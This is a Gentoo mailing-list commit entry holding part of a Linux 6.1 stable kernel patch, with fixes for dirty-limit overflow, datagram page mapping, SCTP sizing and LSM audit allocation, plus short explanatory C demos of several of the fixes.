+  * @lock: the mutex to be destroyed
+diff --git a/lib/kunit/try-catch.c b/lib/kunit/try-catch.c
+index d9d1df28cc52e..9c9e4dcf06d96 100644
+--- a/lib/kunit/try-catch.c
++++ b/lib/kunit/try-catch.c
+@@ -78,7 +78,6 @@ void kunit_try_catch_run(struct kunit_try_catch *try_catch, void *context)
+ 	time_remaining = wait_for_completion_timeout(&try_completion,
+ 						     kunit_test_timeout());
+ 	if (time_remaining == 0) {
+-		kunit_err(test, "try timed out\n");
+ 		try_catch->try_result = -ETIMEDOUT;
+ 		kthread_stop(task_struct);
+ 	}
+@@ -93,6 +92,8 @@ void kunit_try_catch_run(struct kunit_try_catch *try_catch, void *context)
+ 		try_catch->try_result = 0;
+ 	else if (exit_code == -EINTR)
+ 		kunit_err(test, "wake_up_process() was never called\n");
++	else if (exit_code == -ETIMEDOUT)
++		kunit_err(test, "try timed out\n");
+ 	else if (exit_code)
+ 		kunit_err(test, "Unknown error: %d\n", exit_code);
+ 
+diff --git a/mm/page-writeback.c b/mm/page-writeback.c
+index d3e9d12860b9f..7dbac6ede7242 100644
+--- a/mm/page-writeback.c
++++ b/mm/page-writeback.c
+@@ -414,13 +414,20 @@ static void domain_dirty_limits(struct dirty_throttle_control *dtc)
+ 	else
+ 		bg_thresh = (bg_ratio * available_memory) / PAGE_SIZE;
+ 
+-	if (bg_thresh >= thresh)
+-		bg_thresh = thresh / 2;
+ 	tsk = current;
+ 	if (rt_task(tsk)) {
+ 		bg_thresh += bg_thresh / 4 + global_wb_domain.dirty_limit / 32;
+ 		thresh += thresh / 4 + global_wb_domain.dirty_limit / 32;
+ 	}
++	/*
++	 * Dirty throttling logic assumes the limits in page units fit into
++	 * 32-bits. This gives 16TB dirty limits max which is hopefully enough.
++	 */
++	if (thresh > UINT_MAX)
++		thresh = UINT_MAX;
++	/* This makes sure bg_thresh is within 32-bits as well */
++	if (bg_thresh >= thresh)
++		bg_thresh = thresh / 2;
+ 	dtc->thresh = thresh;
+ 	dtc->bg_thresh = bg_thresh;
+ 
+@@ -470,7 +477,11 @@ static unsigned long node_dirty_limit(struct pglist_data *pgdat)
+ 	if (rt_task(tsk))
+ 		dirty += dirty / 4;
+ 
+-	return dirty;
++	/*
++	 * Dirty throttling logic assumes the limits in page units fit into
++	 * 32-bits. This gives 16TB dirty limits max which is hopefully enough.
++	 */
++	return min_t(unsigned long, dirty, UINT_MAX);
+ }
+ 
+ /**
+@@ -507,10 +518,17 @@ static int dirty_background_bytes_handler(struct ctl_table *table, int write,
+ 		void *buffer, size_t *lenp, loff_t *ppos)
+ {
+ 	int ret;
++	unsigned long old_bytes = dirty_background_bytes;
+ 
+ 	ret = proc_doulongvec_minmax(table, write, buffer, lenp, ppos);
+-	if (ret == 0 && write)
++	if (ret == 0 && write) {
++		if (DIV_ROUND_UP(dirty_background_bytes, PAGE_SIZE) >
++								UINT_MAX) {
++			dirty_background_bytes = old_bytes;
++			return -ERANGE;
++		}
+ 		dirty_background_ratio = 0;
++	}
+ 	return ret;
+ }
+ 
+@@ -536,6 +554,10 @@ static int dirty_bytes_handler(struct ctl_table *table, int write,
+ 
+ 	ret = proc_doulongvec_minmax(table, write, buffer, lenp, ppos);
+ 	if (ret == 0 && write && vm_dirty_bytes != old_bytes) {
++		if (DIV_ROUND_UP(vm_dirty_bytes, PAGE_SIZE) > UINT_MAX) {
++			vm_dirty_bytes = old_bytes;
++			return -ERANGE;
++		}
+ 		writeback_set_ratelimit();
+ 		vm_dirty_ratio = 0;
+ 	}
+@@ -1526,7 +1548,7 @@ static inline void wb_dirty_limits(struct dirty_throttle_control *dtc)
+ 	 */
+ 	dtc->wb_thresh = __wb_calc_thresh(dtc);
+ 	dtc->wb_bg_thresh = dtc->thresh ?
+-		div64_u64(dtc->wb_thresh * dtc->bg_thresh, dtc->thresh) : 0;
++		div_u64((u64)dtc->wb_thresh * dtc->bg_thresh, dtc->thresh) : 0;
+ 
+ 	/*
+ 	 * In order to avoid the stacked BDI deadlock we need
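The two sysctl handlers above reject byte values whose page count would no longer fit in 32 bits, keeping the dirty-throttling math in 32-bit page units. The guarded arithmetic as a runnable check, assuming a 64-bit unsigned long and a 4 KiB page size:

#include <limits.h>
#include <stdio.h>

#define PAGE_SIZE	    4096UL
#define DIV_ROUND_UP(n, d)  (((n) + (d) - 1) / (d))

static int validate_dirty_bytes(unsigned long bytes)
{
	/* Dirty throttling keeps its limits in 32-bit page units, so
	 * reject anything above UINT_MAX pages (~16TB at 4KiB pages).
	 */
	if (DIV_ROUND_UP(bytes, PAGE_SIZE) > UINT_MAX)
		return -1;		/* -ERANGE in the kernel */
	return 0;
}

int main(void)
{
	printf("1GiB:  %d\n", validate_dirty_bytes(1UL << 30));	/* 0 */
	printf("32TiB: %d\n", validate_dirty_bytes(1UL << 45));	/* -1 */
	return 0;
}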
+diff --git a/net/core/datagram.c b/net/core/datagram.c
+index 8dabb9a74cb17..cdd65ca3124a4 100644
+--- a/net/core/datagram.c
++++ b/net/core/datagram.c
+@@ -434,15 +434,22 @@ static int __skb_datagram_iter(const struct sk_buff *skb, int offset,
+ 
+ 		end = start + skb_frag_size(frag);
+ 		if ((copy = end - offset) > 0) {
+-			struct page *page = skb_frag_page(frag);
+-			u8 *vaddr = kmap(page);
++			u32 p_off, p_len, copied;
++			struct page *p;
++			u8 *vaddr;
+ 
+ 			if (copy > len)
+ 				copy = len;
+-			n = INDIRECT_CALL_1(cb, simple_copy_to_iter,
+-					vaddr + skb_frag_off(frag) + offset - start,
+-					copy, data, to);
+-			kunmap(page);
++
++			skb_frag_foreach_page(frag,
++					      skb_frag_off(frag) + offset - start,
++					      copy, p, p_off, p_len, copied) {
++				vaddr = kmap_local_page(p);
++				n = INDIRECT_CALL_1(cb, simple_copy_to_iter,
++					vaddr + p_off, p_len, data, to);
++				kunmap_local(vaddr);
++			}
++
+ 			offset += n;
+ 			if (n != copy)
+ 				goto short_copy;
+diff --git a/net/ipv4/inet_diag.c b/net/ipv4/inet_diag.c
+index 8f690a6e61baa..e4e1999d93f50 100644
+--- a/net/ipv4/inet_diag.c
++++ b/net/ipv4/inet_diag.c
+@@ -1281,6 +1281,7 @@ static int inet_diag_dump_compat(struct sk_buff *skb,
+ 	req.sdiag_family = AF_UNSPEC; /* compatibility */
+ 	req.sdiag_protocol = inet_diag_type2proto(cb->nlh->nlmsg_type);
+ 	req.idiag_ext = rc->idiag_ext;
++	req.pad = 0;
+ 	req.idiag_states = rc->idiag_states;
+ 	req.id = rc->id;
+ 
+@@ -1296,6 +1297,7 @@ static int inet_diag_get_exact_compat(struct sk_buff *in_skb,
+ 	req.sdiag_family = rc->idiag_family;
+ 	req.sdiag_protocol = inet_diag_type2proto(nlh->nlmsg_type);
+ 	req.idiag_ext = rc->idiag_ext;
++	req.pad = 0;
+ 	req.idiag_states = rc->idiag_states;
+ 	req.id = rc->id;
+ 
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 2146299016eda..317cb90d77102 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -3041,7 +3041,7 @@ static void tcp_fastretrans_alert(struct sock *sk, const u32 prior_snd_una,
+ 			return;
+ 
+ 		if (tcp_try_undo_dsack(sk))
+-			tcp_try_keep_open(sk);
++			tcp_try_to_open(sk, flag);
+ 
+ 		tcp_identify_packet_loss(sk, ack_flag);
+ 		if (icsk->icsk_ca_state != TCP_CA_Recovery) {
+diff --git a/net/ipv4/tcp_metrics.c b/net/ipv4/tcp_metrics.c
+index a7364ff8b558d..a4e03a7a2c030 100644
+--- a/net/ipv4/tcp_metrics.c
++++ b/net/ipv4/tcp_metrics.c
+@@ -619,6 +619,7 @@ static const struct nla_policy tcp_metrics_nl_policy[TCP_METRICS_ATTR_MAX + 1] =
+ 	[TCP_METRICS_ATTR_ADDR_IPV4]	= { .type = NLA_U32, },
+ 	[TCP_METRICS_ATTR_ADDR_IPV6]	= { .type = NLA_BINARY,
+ 					    .len = sizeof(struct in6_addr), },
++	[TCP_METRICS_ATTR_SADDR_IPV4]	= { .type = NLA_U32, },
+ 	/* Following attributes are not received for GET/DEL,
+ 	 * we keep them for reference
+ 	 */
+diff --git a/net/mac802154/main.c b/net/mac802154/main.c
+index bd7bdb1219dd8..356e86c3c9b15 100644
+--- a/net/mac802154/main.c
++++ b/net/mac802154/main.c
+@@ -152,8 +152,10 @@ void ieee802154_configure_durations(struct wpan_phy *phy)
+ 	}
+ 
+ 	phy->symbol_duration = duration;
+-	phy->lifs_period = (IEEE802154_LIFS_PERIOD * phy->symbol_duration) / NSEC_PER_SEC;
+-	phy->sifs_period = (IEEE802154_SIFS_PERIOD * phy->symbol_duration) / NSEC_PER_SEC;
++	phy->lifs_period =
++		(IEEE802154_LIFS_PERIOD * phy->symbol_duration) / NSEC_PER_USEC;
++	phy->sifs_period =
++		(IEEE802154_SIFS_PERIOD * phy->symbol_duration) / NSEC_PER_USEC;
+ }
+ EXPORT_SYMBOL(ieee802154_configure_durations);
+ 
+@@ -175,10 +177,10 @@ static void ieee802154_setup_wpan_phy_pib(struct wpan_phy *wpan_phy)
+ 	 * Should be done when all drivers sets this value.
+ 	 */
+ 
+-	wpan_phy->lifs_period =
+-		(IEEE802154_LIFS_PERIOD * wpan_phy->symbol_duration) / 1000;
+-	wpan_phy->sifs_period =
+-		(IEEE802154_SIFS_PERIOD * wpan_phy->symbol_duration) / 1000;
++	wpan_phy->lifs_period =	(IEEE802154_LIFS_PERIOD *
++				 wpan_phy->symbol_duration) / NSEC_PER_USEC;
++	wpan_phy->sifs_period =	(IEEE802154_SIFS_PERIOD *
++				 wpan_phy->symbol_duration) / NSEC_PER_USEC;
+ }
+ 
+ int ieee802154_register_hw(struct ieee802154_hw *hw)
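The fix above divides the nanosecond product by NSEC_PER_USEC rather than NSEC_PER_SEC, since lifs_period/sifs_period are kept in microseconds; the old divisor truncated both periods to zero. The difference, checked in plain C (the 40-symbol LIFS count and 16 us symbol duration are illustrative values, not taken from the headers):

#include <stdio.h>

#define NSEC_PER_USEC	1000UL
#define NSEC_PER_SEC	1000000000UL
#define LIFS_SYMBOLS	40UL	/* stand-in for IEEE802154_LIFS_PERIOD */

int main(void)
{
	unsigned long symbol_duration_ns = 16000;	/* 16 us per symbol */

	/* Old divisor: converts to whole seconds, i.e. truncates to 0. */
	printf("lifs (bad):  %lu\n",
	       LIFS_SYMBOLS * symbol_duration_ns / NSEC_PER_SEC);
	/* New divisor: nanoseconds -> microseconds, as the field expects. */
	printf("lifs (good): %lu us\n",
	       LIFS_SYMBOLS * symbol_duration_ns / NSEC_PER_USEC);
	return 0;
}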
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 97ea72d31bd35..d18b698139caf 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -10858,8 +10858,7 @@ static int nft_rcv_nl_event(struct notifier_block *this, unsigned long event,
+ 
+ 	gc_seq = nft_gc_seq_begin(nft_net);
+ 
+-	if (!list_empty(&nf_tables_destroy_list))
+-		nf_tables_trans_destroy_flush_work();
++	nf_tables_trans_destroy_flush_work();
+ again:
+ 	list_for_each_entry(table, &nft_net->tables, list) {
+ 		if (nft_table_has_owner(table) &&
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 237a6b04adf6f..9689d2f2d91f9 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -7116,6 +7116,7 @@ static int sctp_getsockopt_assoc_ids(struct sock *sk, int len,
+ 	struct sctp_sock *sp = sctp_sk(sk);
+ 	struct sctp_association *asoc;
+ 	struct sctp_assoc_ids *ids;
++	size_t ids_size;
+ 	u32 num = 0;
+ 
+ 	if (sctp_style(sk, TCP))
+@@ -7128,11 +7129,11 @@ static int sctp_getsockopt_assoc_ids(struct sock *sk, int len,
+ 		num++;
+ 	}
+ 
+-	if (len < sizeof(struct sctp_assoc_ids) + sizeof(sctp_assoc_t) * num)
++	ids_size = struct_size(ids, gaids_assoc_id, num);
++	if (len < ids_size)
+ 		return -EINVAL;
+ 
+-	len = sizeof(struct sctp_assoc_ids) + sizeof(sctp_assoc_t) * num;
+-
++	len = ids_size;
+ 	ids = kmalloc(len, GFP_USER | __GFP_NOWARN);
+ 	if (unlikely(!ids))
+ 		return -ENOMEM;
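struct_size(ids, gaids_assoc_id, num) above computes sizeof(*ids) plus num flexible-array elements and saturates to SIZE_MAX on overflow, so the subsequent len < ids_size comparison fails safely instead of wrapping. A userspace approximation using the compiler's overflow builtins (the struct layout is illustrative, not the uapi definition):

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct assoc_ids {
	uint32_t gaids_number_of_ids;
	int32_t  gaids_assoc_id[];	/* flexible array member */
};

/* Rough stand-in for the kernel's struct_size(): saturate on overflow. */
static size_t struct_size_ids(size_t num)
{
	size_t bytes;

	if (__builtin_mul_overflow(num, sizeof(int32_t), &bytes) ||
	    __builtin_add_overflow(bytes, sizeof(struct assoc_ids), &bytes))
		return SIZE_MAX;	/* the caller's length check then fails */
	return bytes;
}

int main(void)
{
	printf("%zu\n", struct_size_ids(3));		/* 4 + 3*4 = 16 */
	printf("%zu\n", struct_size_ids(SIZE_MAX));	/* saturates */
	return 0;
}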
+diff --git a/scripts/link-vmlinux.sh b/scripts/link-vmlinux.sh
+index 458b2948b580d..019560548ac98 100755
+--- a/scripts/link-vmlinux.sh
++++ b/scripts/link-vmlinux.sh
+@@ -182,7 +182,7 @@ kallsyms_step()
+ 	mksysmap ${kallsyms_vmlinux} ${kallsyms_vmlinux}.syms
+ 	kallsyms ${kallsyms_vmlinux}.syms ${kallsyms_S}
+ 
+-	info AS ${kallsyms_S}
++	info AS ${kallsymso}
+ 	${CC} ${NOSTDINC_FLAGS} ${LINUXINCLUDE} ${KBUILD_CPPFLAGS} \
+ 	      ${KBUILD_AFLAGS} ${KBUILD_AFLAGS_KERNEL} \
+ 	      -c -o ${kallsymso} ${kallsyms_S}
+diff --git a/security/apparmor/audit.c b/security/apparmor/audit.c
+index 704b0c895605a..963df28584eed 100644
+--- a/security/apparmor/audit.c
++++ b/security/apparmor/audit.c
+@@ -173,7 +173,7 @@ void aa_audit_rule_free(void *vrule)
+ 	}
+ }
+ 
+-int aa_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule)
++int aa_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule, gfp_t gfp)
+ {
+ 	struct aa_audit_rule *rule;
+ 
+@@ -186,14 +186,14 @@ int aa_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule)
+ 		return -EINVAL;
+ 	}
+ 
+-	rule = kzalloc(sizeof(struct aa_audit_rule), GFP_KERNEL);
++	rule = kzalloc(sizeof(struct aa_audit_rule), gfp);
+ 
+ 	if (!rule)
+ 		return -ENOMEM;
+ 
+ 	/* Currently rules are treated as coming from the root ns */
+ 	rule->label = aa_label_parse(&root_ns->unconfined->label, rulestr,
+-				     GFP_KERNEL, true, false);
++				     gfp, true, false);
+ 	if (IS_ERR(rule->label)) {
+ 		int err = PTR_ERR(rule->label);
+ 		aa_audit_rule_free(rule);
+diff --git a/security/apparmor/include/audit.h b/security/apparmor/include/audit.h
+index 18519a4eb67e3..f325f1bef8d6d 100644
+--- a/security/apparmor/include/audit.h
++++ b/security/apparmor/include/audit.h
+@@ -186,7 +186,7 @@ static inline int complain_error(int error)
+ }
+ 
+ void aa_audit_rule_free(void *vrule);
+-int aa_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule);
++int aa_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule, gfp_t gfp);
+ int aa_audit_rule_known(struct audit_krule *rule);
+ int aa_audit_rule_match(u32 sid, u32 field, u32 op, void *vrule);
+ 
+diff --git a/security/integrity/ima/ima.h b/security/integrity/ima/ima.h
+index be965a8715e4e..c80bc15b4486e 100644
+--- a/security/integrity/ima/ima.h
++++ b/security/integrity/ima/ima.h
+@@ -428,7 +428,7 @@ static inline void ima_free_modsig(struct modsig *modsig)
+ #else
+ 
+ static inline int ima_filter_rule_init(u32 field, u32 op, char *rulestr,
+-				       void **lsmrule)
++				       void **lsmrule, gfp_t gfp)
+ {
+ 	return -EINVAL;
+ }
+diff --git a/security/integrity/ima/ima_policy.c b/security/integrity/ima/ima_policy.c
+index bdc40535ff489..1f930711db769 100644
+--- a/security/integrity/ima/ima_policy.c
++++ b/security/integrity/ima/ima_policy.c
+@@ -377,7 +377,8 @@ static void ima_free_rule(struct ima_rule_entry *entry)
+ 	kfree(entry);
+ }
+ 
+-static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry)
++static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry,
++						gfp_t gfp)
+ {
+ 	struct ima_rule_entry *nentry;
+ 	int i;
+@@ -386,7 +387,7 @@ static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry)
+ 	 * Immutable elements are copied over as pointers and data; only
+ 	 * lsm rules can change
+ 	 */
+-	nentry = kmemdup(entry, sizeof(*nentry), GFP_KERNEL);
++	nentry = kmemdup(entry, sizeof(*nentry), gfp);
+ 	if (!nentry)
+ 		return NULL;
+ 
+@@ -401,7 +402,8 @@ static struct ima_rule_entry *ima_lsm_copy_rule(struct ima_rule_entry *entry)
+ 
+ 		ima_filter_rule_init(nentry->lsm[i].type, Audit_equal,
+ 				     nentry->lsm[i].args_p,
+-				     &nentry->lsm[i].rule);
++				     &nentry->lsm[i].rule,
++				     gfp);
+ 		if (!nentry->lsm[i].rule)
+ 			pr_warn("rule for LSM \'%s\' is undefined\n",
+ 				nentry->lsm[i].args_p);
+@@ -414,7 +416,7 @@ static int ima_lsm_update_rule(struct ima_rule_entry *entry)
+ 	int i;
+ 	struct ima_rule_entry *nentry;
+ 
+-	nentry = ima_lsm_copy_rule(entry);
++	nentry = ima_lsm_copy_rule(entry, GFP_KERNEL);
+ 	if (!nentry)
+ 		return -ENOMEM;
+ 
+@@ -638,7 +640,7 @@ static bool ima_match_rules(struct ima_rule_entry *rule,
+ 		}
+ 
+ 		if (rc == -ESTALE && !rule_reinitialized) {
+-			lsm_rule = ima_lsm_copy_rule(rule);
++			lsm_rule = ima_lsm_copy_rule(rule, GFP_ATOMIC);
+ 			if (lsm_rule) {
+ 				rule_reinitialized = true;
+ 				goto retry;
+@@ -1113,7 +1115,8 @@ static int ima_lsm_rule_init(struct ima_rule_entry *entry,
+ 	entry->lsm[lsm_rule].type = audit_type;
+ 	result = ima_filter_rule_init(entry->lsm[lsm_rule].type, Audit_equal,
+ 				      entry->lsm[lsm_rule].args_p,
+-				      &entry->lsm[lsm_rule].rule);
++				      &entry->lsm[lsm_rule].rule,
++				      GFP_KERNEL);
+ 	if (!entry->lsm[lsm_rule].rule) {
+ 		pr_warn("rule for LSM \'%s\' is undefined\n",
+ 			entry->lsm[lsm_rule].args_p);
+diff --git a/security/security.c b/security/security.c
+index 1b504c296551c..fb1692254851b 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -2617,9 +2617,11 @@ int security_key_getsecurity(struct key *key, char **_buffer)
+ 
+ #ifdef CONFIG_AUDIT
+ 
+-int security_audit_rule_init(u32 field, u32 op, char *rulestr, void **lsmrule)
++int security_audit_rule_init(u32 field, u32 op, char *rulestr, void **lsmrule,
++			     gfp_t gfp)
+ {
+-	return call_int_hook(audit_rule_init, 0, field, op, rulestr, lsmrule);
++	return call_int_hook(audit_rule_init, 0, field, op, rulestr, lsmrule,
++			     gfp);
+ }
+ 
+ int security_audit_rule_known(struct audit_krule *krule)
+diff --git a/security/selinux/include/audit.h b/security/selinux/include/audit.h
+index 406bceb90c6cd..ef54f61a30669 100644
+--- a/security/selinux/include/audit.h
++++ b/security/selinux/include/audit.h
+@@ -21,12 +21,14 @@
+  *	@op: the operator the rule uses
+  *	@rulestr: the text "target" of the rule
+  *	@rule: pointer to the new rule structure returned via this
++ *	@gfp: GFP flag used for kmalloc
+  *
+  *	Returns 0 if successful, -errno if not.  On success, the rule structure
+  *	will be allocated internally.  The caller must free this structure with
+  *	selinux_audit_rule_free() after use.
+  */
+-int selinux_audit_rule_init(u32 field, u32 op, char *rulestr, void **rule);
++int selinux_audit_rule_init(u32 field, u32 op, char *rulestr, void **rule,
++			    gfp_t gfp);
+ 
+ /**
+  *	selinux_audit_rule_free - free an selinux audit rule structure.
+diff --git a/security/selinux/ss/services.c b/security/selinux/ss/services.c
+index 64a6a37dc36d9..2b8ebd390e375 100644
+--- a/security/selinux/ss/services.c
++++ b/security/selinux/ss/services.c
+@@ -3563,7 +3563,8 @@ void selinux_audit_rule_free(void *vrule)
+ 	}
+ }
+ 
+-int selinux_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule)
++int selinux_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule,
++			    gfp_t gfp)
+ {
+ 	struct selinux_state *state = &selinux_state;
+ 	struct selinux_policy *policy;
+@@ -3604,7 +3605,7 @@ int selinux_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule)
+ 		return -EINVAL;
+ 	}
+ 
+-	tmprule = kzalloc(sizeof(struct selinux_audit_rule), GFP_KERNEL);
++	tmprule = kzalloc(sizeof(struct selinux_audit_rule), gfp);
+ 	if (!tmprule)
+ 		return -ENOMEM;
+ 
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index feba69549d086..b0a483e40c827 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -4552,11 +4552,13 @@ static int smack_post_notification(const struct cred *w_cred,
+  * @op: required testing operator (=, !=, >, <, ...)
+  * @rulestr: smack label to be audited
+  * @vrule: pointer to save our own audit rule representation
++ * @gfp: type of the memory for the allocation
+  *
+  * Prepare to audit cases where (@field @op @rulestr) is true.
+  * The label to be audited is created if necessary.
+  */
+-static int smack_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule)
++static int smack_audit_rule_init(u32 field, u32 op, char *rulestr, void **vrule,
++				 gfp_t gfp)
+ {
+ 	struct smack_known *skp;
+ 	char **rule = (char **)vrule;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 11ec5783a2f17..4635dc70a8404 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -11584,6 +11584,7 @@ enum {
+ 	ALC897_FIXUP_LENOVO_HEADSET_MODE,
+ 	ALC897_FIXUP_HEADSET_MIC_PIN2,
+ 	ALC897_FIXUP_UNIS_H3C_X500S,
++	ALC897_FIXUP_HEADSET_MIC_PIN3,
+ };
+ 
+ static const struct hda_fixup alc662_fixups[] = {
+@@ -12030,10 +12031,18 @@ static const struct hda_fixup alc662_fixups[] = {
+ 			{}
+ 		},
+ 	},
++	[ALC897_FIXUP_HEADSET_MIC_PIN3] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03a11050 }, /* use as headset mic */
++			{ }
++		},
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc662_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1019, 0x9087, "ECS", ALC662_FIXUP_ASUS_MODE2),
++	SND_PCI_QUIRK(0x1019, 0x9859, "JP-IK LEAP W502", ALC897_FIXUP_HEADSET_MIC_PIN3),
+ 	SND_PCI_QUIRK(0x1025, 0x022f, "Acer Aspire One", ALC662_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x1025, 0x0241, "Packard Bell DOTS", ALC662_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x1025, 0x0308, "Acer Aspire 8942G", ALC662_FIXUP_ASPIRE),
+diff --git a/tools/lib/bpf/bpf_core_read.h b/tools/lib/bpf/bpf_core_read.h
+index 496e6a8ee0dc9..41740ae8aad73 100644
+--- a/tools/lib/bpf/bpf_core_read.h
++++ b/tools/lib/bpf/bpf_core_read.h
+@@ -102,6 +102,7 @@ enum bpf_enum_value_kind {
+ 	case 2: val = *(const unsigned short *)p; break;		      \
+ 	case 4: val = *(const unsigned int *)p; break;			      \
+ 	case 8: val = *(const unsigned long long *)p; break;		      \
++	default: val = 0; break;					      \
+ 	}								      \
+ 	val <<= __CORE_RELO(s, field, LSHIFT_U64);			      \
+ 	if (__CORE_RELO(s, field, SIGNED))				      \
+diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c
+index a41bad8e653bb..66e31da942588 100644
+--- a/tools/power/x86/turbostat/turbostat.c
++++ b/tools/power/x86/turbostat/turbostat.c
+@@ -566,6 +566,7 @@ struct topo_params {
+ 	int num_cpus;
+ 	int num_cores;
+ 	int max_cpu_num;
++	int max_die_id;
+ 	int max_node_num;
+ 	int nodes_per_pkg;
+ 	int cores_per_node;
+@@ -5864,7 +5865,6 @@ void topology_probe()
+ 	int i;
+ 	int max_core_id = 0;
+ 	int max_package_id = 0;
+-	int max_die_id = 0;
+ 	int max_siblings = 0;
+ 
+ 	/* Initialize num_cpus, max_cpu_num */
+@@ -5933,8 +5933,8 @@ void topology_probe()
+ 
+ 		/* get die information */
+ 		cpus[i].die_id = get_die_id(i);
+-		if (cpus[i].die_id > max_die_id)
+-			max_die_id = cpus[i].die_id;
++		if (cpus[i].die_id > topo.max_die_id)
++			topo.max_die_id = cpus[i].die_id;
+ 
+ 		/* get numa node information */
+ 		cpus[i].physical_node_id = get_physical_node_id(&cpus[i]);
+@@ -5960,9 +5960,9 @@ void topology_probe()
+ 	if (!summary_only && topo.cores_per_node > 1)
+ 		BIC_PRESENT(BIC_Core);
+ 
+-	topo.num_die = max_die_id + 1;
++	topo.num_die = topo.max_die_id + 1;
+ 	if (debug > 1)
+-		fprintf(outf, "max_die_id %d, sizing for %d die\n", max_die_id, topo.num_die);
++		fprintf(outf, "max_die_id %d, sizing for %d die\n", topo.max_die_id, topo.num_die);
+ 	if (!summary_only && topo.num_die > 1)
+ 		BIC_PRESENT(BIC_Die);
+ 
+diff --git a/tools/testing/selftests/net/msg_zerocopy.c b/tools/testing/selftests/net/msg_zerocopy.c
+index bdc03a2097e85..7ea5fb28c93db 100644
+--- a/tools/testing/selftests/net/msg_zerocopy.c
++++ b/tools/testing/selftests/net/msg_zerocopy.c
+@@ -85,6 +85,7 @@ static bool cfg_rx;
+ static int  cfg_runtime_ms	= 4200;
+ static int  cfg_verbose;
+ static int  cfg_waittime_ms	= 500;
++static int  cfg_notification_limit = 32;
+ static bool cfg_zerocopy;
+ 
+ static socklen_t cfg_alen;
+@@ -95,6 +96,7 @@ static char payload[IP_MAXPACKET];
+ static long packets, bytes, completions, expected_completions;
+ static int  zerocopied = -1;
+ static uint32_t next_completion;
++static uint32_t sends_since_notify;
+ 
+ static unsigned long gettimeofday_ms(void)
+ {
+@@ -208,6 +210,7 @@ static bool do_sendmsg(int fd, struct msghdr *msg, bool do_zerocopy, int domain)
+ 		error(1, errno, "send");
+ 	if (cfg_verbose && ret != len)
+ 		fprintf(stderr, "send: ret=%u != %u\n", ret, len);
++	sends_since_notify++;
+ 
+ 	if (len) {
+ 		packets++;
+@@ -435,7 +438,7 @@ static bool do_recv_completion(int fd, int domain)
+ 	/* Detect notification gaps. These should not happen often, if at all.
+ 	 * Gaps can occur due to drops, reordering and retransmissions.
+ 	 */
+-	if (lo != next_completion)
++	if (cfg_verbose && lo != next_completion)
+ 		fprintf(stderr, "gap: %u..%u does not append to %u\n",
+ 			lo, hi, next_completion);
+ 	next_completion = hi + 1;
+@@ -460,6 +463,7 @@ static bool do_recv_completion(int fd, int domain)
+ static void do_recv_completions(int fd, int domain)
+ {
+ 	while (do_recv_completion(fd, domain)) {}
++	sends_since_notify = 0;
+ }
+ 
+ /* Wait for all remaining completions on the errqueue */
+@@ -549,6 +553,9 @@ static void do_tx(int domain, int type, int protocol)
+ 		else
+ 			do_sendmsg(fd, &msg, cfg_zerocopy, domain);
+ 
++		if (cfg_zerocopy && sends_since_notify >= cfg_notification_limit)
++			do_recv_completions(fd, domain);
++
+ 		while (!do_poll(fd, POLLOUT)) {
+ 			if (cfg_zerocopy)
+ 				do_recv_completions(fd, domain);
+@@ -708,7 +715,7 @@ static void parse_opts(int argc, char **argv)
+ 
+ 	cfg_payload_len = max_payload_len;
+ 
+-	while ((c = getopt(argc, argv, "46c:C:D:i:mp:rs:S:t:vz")) != -1) {
++	while ((c = getopt(argc, argv, "46c:C:D:i:l:mp:rs:S:t:vz")) != -1) {
+ 		switch (c) {
+ 		case '4':
+ 			if (cfg_family != PF_UNSPEC)
+@@ -736,6 +743,9 @@ static void parse_opts(int argc, char **argv)
+ 			if (cfg_ifindex == 0)
+ 				error(1, errno, "invalid iface: %s", optarg);
+ 			break;
++		case 'l':
++			cfg_notification_limit = strtoul(optarg, NULL, 0);
++			break;
+ 		case 'm':
+ 			cfg_cork_mixed = true;
+ 			break;
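With the new -l option the sender reaps completion notifications once sends_since_notify reaches cfg_notification_limit (default 32), instead of waiting until poll() blocks. The exact invocation normally comes from the msg_zerocopy.sh harness, so the following sender command line is only a hypothetical illustration of passing a lower limit:

./msg_zerocopy -4 -z -l 8 -D 127.0.0.1 tcp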


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-07-05 11:07 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-07-05 11:07 UTC (permalink / raw
  To: gentoo-commits

commit:     26b4a045b52fba61fefc67ae515a415b96750940
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jul  5 11:07:06 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
